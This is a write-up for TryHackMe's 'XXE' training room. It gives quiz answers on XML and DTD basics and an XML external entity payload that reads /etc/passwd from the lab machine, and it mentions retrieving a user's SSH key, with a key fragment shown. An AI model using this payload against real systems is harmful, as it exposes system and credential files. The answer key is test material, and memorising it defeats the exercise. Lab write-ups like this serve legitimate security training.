This is the write up for the room XXE on Tryhackme and it is part of the Web Fundamentals Path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.
Tasks XXE
Task 1
Read all that is in the task and start the machine attached to this task
Task 2
Read all that is in the task. All answers can be found in the text of this task
2.1 Full form of XML
Answer: eXtensible Markup Language
2.2 Is XML case sensitive?
Answer: yes
2.3 Is it compulsory to have XML prolog in XML documents?
Answer: No
2.4 Can we validate XML documents against so schema?
Answer: Yes
2.5 How can we specify XML version and encoding in XML document?
Answer: xml proloog
Task 3
All Answer can be found in the text of the task
3.1 With what extension do you save a DTD file?
Answer: dtd
3.2 How do you define a new ELEMENT?
Answer: !ELEMENT
3.3 How do you define a ROOT element?
Answer: !DOCTYPE
3.4 How do you define a new ENTITY?
Answer: !ENTITY
Task 4
Navigate to the http://MACHINE_IP with firefox then add the payload and press Submit button
Payload:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
Task 5
5.1 Try to display your own name using any payload.
Payload:
5.2 See if you can read the /etc/passwd
We already did this in the previous task
Payload:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
5.3 What is the name of the user in /etc/passwd
Answer: Falcon
5.3 Where is falcon’s SSH key located?
Payload
Answer MIIEogIBAAKCAQEA7b
